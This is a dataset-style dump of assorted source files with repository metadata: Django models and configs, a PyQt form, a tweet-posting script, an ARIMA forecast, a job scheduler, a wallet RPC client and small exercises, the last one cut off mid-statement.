blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1489a49a4e6ccd3697af23f1e682ca9574953838 | efe6c52938fe5c7a259514ad317484057edfeff7 | /tube/models.py | 7526f1fa46150f5b12037f9489d41f329289eb0d | [] | no_license | seiya0723/video_site_02 | 69413879248a2cc314dd5c83c9bedb564e170aba | 5ffcccb1f64b83bb3bf1c9bfd42c9896ff28eb85 | refs/heads/master | 2023-03-31T21:02:25.877950 | 2021-04-14T00:45:14 | 2021-04-14T00:45:14 | 357,728,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | from django.db import models
from django.utils import timezone
class Video(models.Model):
    """An uploaded video: title, description text and posting timestamp."""

    class Meta:
        db_table = "video"

    # verbose_name values are intentionally Japanese admin/UI labels.
    title = models.CharField(verbose_name="タイトル", max_length=30)
    comment = models.CharField(verbose_name="動画説明文", max_length=2000)
    dt = models.DateTimeField(verbose_name="投稿日", default=timezone.now)

    def __str__(self):
        # Human-readable representation used by the Django admin.
        return self.title
"seiya@asahina"
] | seiya@asahina |
c4df5eb4c623e77ba5bafe17d4482898121c0620 | 2ae9bff6837eb29690d2c8d487af33849abbb56e | /stream_hashtag.py | a0ccf879a6580af099c863d11e4a3c7b50d1dc3b | [] | no_license | hellodk/raspberrypi_applications | c66e486befef06a05e02a8135608688fb8c459a5 | 1548b54284ef3d601ea810e12c1207438f5cf6d0 | refs/heads/master | 2021-01-10T10:42:56.789685 | 2016-04-08T17:42:28 | 2016-04-08T17:42:28 | 55,683,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py | from twython import Twython
# NOTE(review): hard-coded Twitter API credentials (appear truncated /
# placeholder here); real keys must never be committed -- load them from
# environment variables or a config file instead.
c_key = "fjsll123299eeDKMLS"
c_secret = "iX"
A_token = "1Cc"
A_secret = "nlo"
# Authenticate against the Twitter REST API via Twython.
api = Twython(c_key, c_secret, A_token, A_secret)
# Post a single status update.  Despite the filename (stream_hashtag.py),
# no streaming API is used here.
api.update_status(status="Testing tweets via raspberry pi")
| [
"hello.dk@outlook.com"
] | hello.dk@outlook.com |
ee9601bac1b898b9e6e175b2b2fb865c7ba57fef | 1a3a9de5c55bff88ba61afe5e18d07ce85d8f8f1 | /lyingthepipe/pipe/pipe/asgi.py | 2f507dcdea0d69ea253e7244697556006df127df | [] | no_license | Saurav7373/DjangoPractice | 841c1fe2e1b6a8f8b3cf07694c34993146e2d1d8 | e79ceaf063c4cb7c7ccaf1352e4f9e5ef757951f | refs/heads/master | 2022-09-05T07:22:34.011781 | 2020-05-28T08:42:02 | 2020-05-28T08:42:02 | 267,535,756 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | """
ASGI config for pipe project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Default the settings module before Django initialises.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pipe.settings')
# Module-level ASGI callable picked up by the application server.
application = get_asgi_application()
| [
"dreamsaurav7373@gmail.com"
] | dreamsaurav7373@gmail.com |
0183ca8e3976bb13e783036d8a712cb2463827aa | ea3583a337648c3d92c6aaf0ff501d6b4e27afef | /venv/Designer/demo.py | 853c293703186cac2bb1d4218d7acb62deccbdbb | [] | no_license | hzq1010/python | 5c06bd347fa1b3c405464e2842217536013a1bc7 | ad9b6bc6c3d8bc7a4bd8fb44852bfa78ada9ecf3 | refs/heads/master | 2022-11-23T07:06:04.131601 | 2020-07-28T12:30:01 | 2020-07-28T12:30:01 | 282,894,095 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,523 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'demo.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
    # Auto-generated by Qt Designer (pyuic5 5.15.0).  Regenerating from the
    # .ui file will overwrite any edits made here, including these comments.
    def setupUi(self, MainWindow):
        # Build the widget tree: a push button, two checkboxes, a line edit
        # and a text edit, plus menu bar, status bar and tool bar.
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(800, 600)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.pushButton = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton.setGeometry(QtCore.QRect(210, 60, 75, 23))
        self.pushButton.setObjectName("pushButton")
        self.checkBox = QtWidgets.QCheckBox(self.centralwidget)
        self.checkBox.setEnabled(True)
        self.checkBox.setGeometry(QtCore.QRect(100, 150, 201, 71))
        self.checkBox.setMouseTracking(True)
        self.checkBox.setCheckable(True)
        self.checkBox.setChecked(True)
        self.checkBox.setTristate(False)
        self.checkBox.setObjectName("checkBox")
        self.checkBox_2 = QtWidgets.QCheckBox(self.centralwidget)
        self.checkBox_2.setGeometry(QtCore.QRect(100, 260, 131, 61))
        self.checkBox_2.setObjectName("checkBox_2")
        self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)
        self.lineEdit.setGeometry(QtCore.QRect(100, 210, 113, 20))
        self.lineEdit.setObjectName("lineEdit")
        self.textEdit = QtWidgets.QTextEdit(self.centralwidget)
        self.textEdit.setGeometry(QtCore.QRect(90, 350, 104, 71))
        self.textEdit.setObjectName("textEdit")
        MainWindow.setCentralWidget(self.centralwidget)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        self.menuBar = QtWidgets.QMenuBar(MainWindow)
        self.menuBar.setGeometry(QtCore.QRect(0, 0, 800, 23))
        self.menuBar.setObjectName("menuBar")
        self.menuFile = QtWidgets.QMenu(self.menuBar)
        self.menuFile.setObjectName("menuFile")
        MainWindow.setMenuBar(self.menuBar)
        self.toolBar = QtWidgets.QToolBar(MainWindow)
        self.toolBar.setObjectName("toolBar")
        MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
        self.actionopen = QtWidgets.QAction(MainWindow)
        self.actionopen.setObjectName("actionopen")
        self.actionclose = QtWidgets.QAction(MainWindow)
        self.actionclose.setCheckable(True)
        self.actionclose.setObjectName("actionclose")
        self.actionOpen = QtWidgets.QAction(MainWindow)
        self.actionOpen.setObjectName("actionOpen")
        self.actionClose = QtWidgets.QAction(MainWindow)
        self.actionClose.setObjectName("actionClose")
        self.menuFile.addAction(self.actionOpen)
        self.menuFile.addAction(self.actionClose)
        self.menuBar.addAction(self.menuFile.menuAction())
        self.toolBar.addSeparator()
        self.toolBar.addAction(self.actionclose)
        self.toolBar.addAction(self.actionopen)
        self.toolBar.addAction(self.actionOpen)
        self.toolBar.addAction(self.actionClose)
        self.retranslateUi(MainWindow)
        # Signal wiring: button closes the window; checkboxes toggle the
        # line edit's visibility and the text edit's enabled state.
        self.pushButton.clicked.connect(MainWindow.close)
        self.checkBox.toggled['bool'].connect(self.lineEdit.setVisible)
        self.checkBox_2.toggled['bool'].connect(self.textEdit.setEnabled)
        self.toolBar.actionTriggered['QAction*'].connect(MainWindow.close)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        # Install all user-visible strings (Qt translation hook); some
        # labels are Chinese UI text.
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
        self.pushButton.setText(_translate("MainWindow", "关闭窗口"))
        self.checkBox.setText(_translate("MainWindow", "显示/隐藏"))
        self.checkBox_2.setText(_translate("MainWindow", "可用/不可用"))
        self.menuFile.setTitle(_translate("MainWindow", "File"))
        self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar"))
        self.actionopen.setText(_translate("MainWindow", "open"))
        self.actionclose.setText(_translate("MainWindow", "close"))
        self.actionclose.setShortcut(_translate("MainWindow", "Ctrl+F"))
        self.actionOpen.setText(_translate("MainWindow", "Open"))
        self.actionClose.setText(_translate("MainWindow", "Close"))
| [
"1546111923@qq.com"
] | 1546111923@qq.com |
95754c0f8dfaeb8b76f2ed013793d5e533646b0d | 10fd11cbc666cae31750dfae5042fc2cd24b2239 | /functions.py | c0cbef1e42767861f2366ccc94459578147a51bf | [] | no_license | amacuga/python-fundamentals | 705b1f08648ed3255cd9915d354ef7aa0ee7f15b | a0b04fe6b061ee4a230e27e2362efb2784204cb4 | refs/heads/master | 2020-07-30T07:33:16.830181 | 2019-10-05T09:25:22 | 2019-10-05T09:25:22 | 210,136,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | def gcd(a, b):
"""
Returns the greates conmmon divisor of a and b.
"""
while b > 0:
a, b = b, a % b
return a
print(gcd(50, 20))
print(gcd(22,143)) | [
"sasenah@gmail.com"
] | sasenah@gmail.com |
5a3f537ce2ab77a4a0a06f433c56ac5b16ef1f92 | df1b5d8ac3bb100aa2b4367868090d1cb73913df | /Graph/POLY.py | 5ccc8f96dc58b39f8f9e6ad1149776e133acb63b | [] | no_license | ace26597/EE-629-Project_Augmented-Reality-based-Smart-Manufacuturing | fb4d6d0920013c1b53ef9990a855bcb74a078122 | 80f78bb3424300bc8204ed350877769dc1dcf995 | refs/heads/main | 2023-02-07T22:59:11.081963 | 2021-01-03T01:39:47 | 2021-01-03T01:39:47 | 315,432,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,804 | py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from statsmodels.tsa.arima_model import ARIMA
import warnings
import pmdarima as pm
warnings.filterwarnings("ignore")
# Load only the signal column for modelling, and the full file for timing.
df = pd.read_csv('data.csv',usecols=['2.Signal Value'], header=0)
dataset=pd.read_csv("data.csv")
# Target timestamp to predict: 50 units past the last observed time.
pred_time = dataset.iloc[-1]["1.Time"]
pred_time = pred_time + 50
new_time = [[pred_time]]
print(pred_time)
# Fit a non-seasonal ARIMA, letting pmdarima pick (p, d, q) stepwise.
model = pm.auto_arima(df.values, start_p=1, start_q=1,
                      test='adf',       # use adftest to find optimal 'd'
                      max_p=3, max_q=3, # maximum p and q
                      m=1,              # frequency of series
                      d=None,           # let model determine 'd'
                      seasonal=False,   # No Seasonality
                      start_P=0,
                      D=0,
                      trace=True,
                      error_action='ignore',
                      suppress_warnings=True,
                      stepwise=True)
print(model.summary())
model.plot_diagnostics(figsize=(7,5))
plt.show()
# Forecast
n_periods = 50
fc, confint = model.predict(n_periods=n_periods, return_conf_int=True)
index_of_fc = np.arange(len(df.values), len(df.values)+n_periods)
# make series for plotting purpose
fc_series = pd.Series(fc, index=index_of_fc)
last_element = fc_series[-1:]
pred_value = last_element[pred_time]
lower_series = pd.Series(confint[:, 0], index=index_of_fc)
upper_series = pd.Series(confint[:, 1], index=index_of_fc)
# Plot forecast with its shaded confidence band.
plt.plot(df.values)
plt.plot(fc_series, color='darkgreen')
plt.fill_between(lower_series.index,
                 lower_series,
                 upper_series,
                 color='k', alpha=.15)
# NOTE(review): title mentions "WWW Usage" but the data is a sensor signal
# from data.csv -- likely a leftover from an example; confirm intent.
plt.title("Final Forecast of WWW Usage")
plt.show()
"noreply@github.com"
] | ace26597.noreply@github.com |
7cb1a76b11e459e1fe780a925cfd1457361cf753 | 9fe1d131029ea41d60c66f5ff534111f3b3859ae | /pycharm/0630/__init__.py | 2ef0303bb70956908d89a36e02401704178cd0e3 | [
"Apache-2.0"
] | permissive | jsqwert/ML-Class | 1cc5765503df74cefa122e416c67333b4d360442 | 276c052bbe37914c289391d0d2d1be03e471086d | refs/heads/master | 2020-03-22T12:39:57.953921 | 2018-08-08T02:11:39 | 2018-08-08T02:11:39 | 140,054,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 64 | py | # -- encoding:utf-8 --
"""
Created by ibf on 2018/6/30
"""
| [
"js@ubuntu.com"
] | js@ubuntu.com |
bfba43a40c44ed33df829ed9cd1755d9c69e70f7 | 736250d9d14552c5fa0aca25b25d9c8a28fcd1a0 | /sssionpro/manage.py | 3b9b39fa5263b2fcca0a11cb1b35b13a433a6d39 | [] | no_license | maheswatapradhan/feedback | 57f052a2082902cb8a72b474e0b863b7a00d1c9c | 31c7dcb113a38e29b3a56481fcb9ae2fce7d61a2 | refs/heads/master | 2020-09-15T23:42:32.041306 | 2019-11-23T12:54:25 | 2019-11-23T12:54:25 | 223,585,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Point Django at this project's settings before touching the framework.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sssionpro.settings")
    # Imported here, at run time, after the settings module is configured.
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
| [
"test@test.com"
] | test@test.com |
c552b68dcdfe5c44e43fb68048e7f0f839981b74 | 0992ee279da802595290be9110aa91580d19fded | /scheduler/scheduler.py | 5e8da48454ba1e909e07557ccef372c4aa9830ef | [] | no_license | shakob/job_scheduler | 0e7248251b2c24309304a9869ab1dce7a6fe996b | 431c85383dd05025701cbd6245c429176f4fcacf | refs/heads/master | 2020-07-24T06:56:50.863292 | 2019-09-11T14:52:43 | 2019-09-11T14:52:43 | 207,830,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,660 | py | #!/usr/bin/python3
import time
from functools import partial, update_wrapper
from threading import Lock, Thread, Event
from typing import List
from scheduler import TimeUnitEnum, Logger, JobTypeEnum, ThreadSafeCounter
from scheduler.job import Job, JOB_FACTORY
from scheduler.thread_pool import ThreadPool
__all__ = ["Scheduler", "TestingScheduler"]
class Scheduler(Thread):
    """
    Background job scheduler.

    Runs as a non-daemon thread until ``join()`` is called, checking once
    per second for due jobs and executing them through a fixed-size
    :class:`ThreadPool`.
    """

    def __init__(self, max_jobs: int):
        """
        :param max_jobs: maximum number of concurrently running jobs
                         (size of the worker thread pool).
        """
        Thread.__init__(self, name="Scheduler", daemon=False)
        self._list_jobs: List[Job] = []
        self._jobs_lock = Lock()
        self._keep_running = Event()
        self._keep_running.set()
        self._thread_pool = ThreadPool(size=max_jobs)
        self.time_unit = TimeUnitEnum.HOURS

    def __len__(self):
        """
        :return: Size of thread pool
        :rtype: int
        """
        return len(self._thread_pool)

    def get_status(self):
        """Return a snapshot dict: time unit, running flag and job statuses."""
        # NOTE(review): self._list_jobs is read here without _jobs_lock, as
        # in the original implementation -- confirm this is acceptable.
        dict_result = {"time_unit": self.time_unit,
                       "is_running": self._keep_running.is_set(),
                       "jobs": [job.get_status() for job in self._list_jobs]}
        return dict_result

    def _pre_run(self):
        # Subclass hook: called at the start of every scheduler cycle.
        pass

    def _post_run(self):
        # Subclass hook: called once after the main loop exits.
        pass

    def run(self):
        """
        Main loop: runs forever until joined, executing pending jobs once
        per second.
        """
        self._thread_pool.start()
        Logger.info("Scheduler Start")
        while self._keep_running.is_set():
            self._pre_run()
            self._run_pending()
            time.sleep(1)
        self._post_run()
        Logger.info("Scheduler Stopped")

    def join(self, timeout=None):
        """Signal the loop to stop, stop the pool, then join the thread."""
        self._keep_running.clear()
        self._thread_pool.stop()
        return super().join(timeout=timeout)

    def _run_pending(self):
        """
        Run pending jobs that should run
            - Should run:: current time > Job's scheduled time
            - Put each job in job queue of thread pool
            - Checks that each Job can continue to the next run
        """
        with self._jobs_lock:
            list_jobs_to_iterate = self._list_jobs
        Logger.info(str(list_jobs_to_iterate))
        list_jobs_to_run = []
        list_remaining_jobs = []
        for job in list_jobs_to_iterate:
            if job.should_run:
                list_jobs_to_run.append(job)
            else:
                list_remaining_jobs.append(job)
        with self._jobs_lock:
            self._list_jobs = list_remaining_jobs
        # Fix: the original re-computed list_jobs_to_run from job.should_run
        # at this point.  should_run is time-dependent, so re-evaluating it
        # after the partition could silently drop a job from both lists or
        # run one twice.  The single partition above is authoritative.
        list_jobs_to_run = sorted(list_jobs_to_run)
        list_threads = [Thread(target=self._thread_pool.run,
                               kwargs={"func": job.run_job},
                               daemon=True)
                        for job in list_jobs_to_run]
        for job_thread in list_threads:
            job_thread.start()
        for job_thread in list_threads:
            job_thread.join()
        # Jobs that did not run this cycle but cannot continue are cleaned
        # up; jobs that ran are re-queued only if they can continue.
        for job in list_remaining_jobs:
            if not job.can_continue():
                job.cleanup()
        for job in list_jobs_to_run:
            if job.can_continue():
                with self._jobs_lock:
                    self._list_jobs.append(job)
            else:
                job.cleanup()

    def add_job(self, interval: int, job_type: JobTypeEnum, *args, **kwargs):
        """
        Create a job of ``job_type`` scheduled every ``interval`` time
        units (the scheduler's current ``time_unit``) and register it.

        :return: the created Job instance.
        """
        job = JOB_FACTORY(job_type)
        j = job(interval=interval, time_unit=self.time_unit, *args, **kwargs)
        with self._jobs_lock:
            self._list_jobs.append(j)
        Logger.info("Add a new Job: {}, interval: {} {}"
                    .format(j.job_id, interval, self.time_unit.value))
        return j

    @staticmethod
    def _get_partial(func, *args, **kwargs):
        """Bind args/kwargs to func, preserving metadata when possible."""
        job_func = partial(func, *args, **kwargs)
        try:
            update_wrapper(job_func, func)
        except AttributeError:
            # job_funcs already wrapped by partial won't have
            # __name__, __module__ or __doc__ and the update_wrapper()
            # call will fail.
            pass
        return job_func
class TestingScheduler(Scheduler):
    # Scheduler variant for tests: uses seconds as the time unit and
    # counts loop iterations so tests can wait for cycles deterministically.
    def __init__(self, max_jobs: int):
        Scheduler.__init__(self, max_jobs=max_jobs)
        self.time_unit = TimeUnitEnum.SECONDS
        self._cycles = ThreadSafeCounter()
    def _pre_run(self):
        # Called once per scheduler cycle (before pending jobs run).
        self._cycles.next()
    def _post_run(self):
        pass
    @property
    def cycles(self):
        """
        :return: Number of cycles scheduler has made
        :rtype: int
        """
        return self._cycles.value
| [
"bhaa.shakur@gmail.com"
] | bhaa.shakur@gmail.com |
021b662c27ba46b313b47cd2438ac8fae908f865 | ebbce9a6fbbf736a756987ba32d09c6084097d54 | /contrib/bitrpc/bitrpc.py | 132114cdf29d8a5b7ff082d5fc11ced856aaee96 | [
"MIT"
] | permissive | growaleaf/castle-master | 548d1c7132c4dfa34e0e4dac9a787a801e77dd9e | a8226db6a12f9b384cb700a2d2b64191d057d708 | refs/heads/master | 2018-12-24T23:42:10.219762 | 2018-11-14T15:35:54 | 2018-11-14T15:35:54 | 108,199,615 | 2 | 2 | MIT | 2018-10-17T22:18:03 | 2017-10-25T00:36:12 | C++ | UTF-8 | Python | false | false | 7,835 | py | from jsonrpc import ServiceProxy
import sys
import string
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:2222")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:2222")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Bitcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Bitcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = raw_input("Enter old wallet passphrase: ")
pwd2 = raw_input("Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported" | [
"growcoindev@gmail.com"
] | growcoindev@gmail.com |
97774fa976928bdcf6c4009c0ca72bc7c085ddb9 | 0b2a5df3447b7427b6da3705513de2b825792222 | /djangoproject/sinbike/common/migrations/0001_initial.py | f6c59f355e63a3b384c99ae7bd4e33f259c9fa37 | [] | no_license | youtube-dm94/Sinbike | 7599af3c4673bcd95ea1aa56fdd68b4cfb0f8b5f | 69afcb86a9dcb30951bdc01f596c7e27a54b332b | refs/heads/main | 2023-07-12T11:59:52.491953 | 2021-08-14T08:30:42 | 2021-08-14T08:30:42 | 362,273,684 | 0 | 2 | null | 2021-08-03T16:17:13 | 2021-04-27T22:56:46 | Python | UTF-8 | Python | false | false | 538 | py | # Generated by Django 2.2.14 on 2021-07-18 22:09
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration: creates the table backing the FAQ
    # model with an auto id plus postname and contents fields.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='FAQ',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('postname', models.CharField(max_length=100)),
                ('contents', models.TextField()),
            ],
        ),
    ]
| [
"63930715+youtube-dm94@users.noreply.github.com"
] | 63930715+youtube-dm94@users.noreply.github.com |
class Animal(object):
    """A simple animal with a name and age, plus shared class-level state."""

    # Class attributes shared by all instances unless shadowed.
    is_alive = True
    health = "good"

    def __init__(self, name, age):
        self.name = name
        self.age = age

    def description(self):
        """Print the animal's name and age, one per line."""
        # Fixed: these were Python 2 print statements while the module's
        # other prints already used call syntax; now consistent/py3-safe.
        print(self.name)
        print(self.age)


hippo = Animal("Ivo", 2)
sloth = Animal("Iva", 3)
ocelot = Animal("Ivi", 1)

hippo.description()
print(hippo.health)
print(sloth.health)
print(ocelot.health)
| [
"noreply@github.com"
] | Jump1556.noreply@github.com |
84e52527a928f7d432a3d31e2f8adb3e799e8143 | 0b3fc937dab7e9cf8242355eec4849728b97e7be | /.vscode/desviocondicional.py/ex5.py | dd3e14a41a78b5f75d905ced99cb4bd7a5a2c9ae | [] | no_license | ElielMendes/Exercicios-da-Faculdade-e-projeto-de-Numerologia-Karmica | 090796ee0ba6f7ed25bce1094b0276b3f910b0ce | 9667f793b0f3243176ddb911d6f82a9d77c042da | refs/heads/main | 2023-04-12T05:43:12.515763 | 2021-05-19T23:37:06 | 2021-05-19T23:37:06 | 362,498,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | n1 = int(input("digite um número inteiro: "))
if (n1%10) == 0:
print("número divisivel por 10 ")
elif (n1%5) == 0:
print("número divisivel por 5 ")
elif (n1%2) == 0:
print("número divisivel por 2 ")
else:
print("número não divisivel por 10, 5 e 2") | [
"eliel.oliveira@aluno.faculdadeimpacta.com.br"
] | eliel.oliveira@aluno.faculdadeimpacta.com.br |
e5c3105a3f2f825626898ed2c619b599f820a0e9 | f1a8e308c76866e2fba20401e6f1d5842dd60c46 | /Algorithms and Data Structures Practice/LeetCode Questions/Greedy/TieRopes.py | 0ca4144df73641761d8095f25ec57753846b4744 | [] | no_license | harman666666/Algorithms-Data-Structures-and-Design | 6e5da0c1f701e7dfc7b045ecd1209463131d3fc7 | 483f0c93faca8ccaf038b77ebe2fa712f6b0c6bc | refs/heads/master | 2021-07-14T10:11:27.588838 | 2021-07-07T01:47:42 | 2021-07-07T01:47:42 | 101,330,760 | 3 | 1 | null | 2018-10-15T04:52:07 | 2017-08-24T19:32:03 | Python | UTF-8 | Python | false | false | 2,234 | py | '''
There are N ropes numbered from 0 to N − 1, whose lengths are given in an array A, lying on the floor in a line. For each I (0 ≤ I < N), the length of rope I on the line is A[I].
We say that two ropes I and I + 1 are adjacent. Two adjacent ropes can be tied together with a knot, and the length of the tied rope is the sum of lengths of both ropes. The resulting new rope can then be tied again.
